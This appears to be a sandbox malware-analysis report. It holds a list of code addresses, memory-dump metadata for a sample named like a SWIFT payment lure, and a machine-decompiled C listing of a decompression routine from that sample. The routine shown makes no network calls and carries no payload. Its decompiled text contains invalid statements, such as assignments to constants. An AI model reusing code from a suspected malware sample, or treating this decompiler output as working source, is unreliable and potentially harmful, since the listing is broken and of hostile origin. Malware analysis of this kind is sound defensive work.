0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004073ce
0x004073cb
0x00000000
0x00407002

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05

Uniqueness

Uniqueness Score: -1.00%

Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040711C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
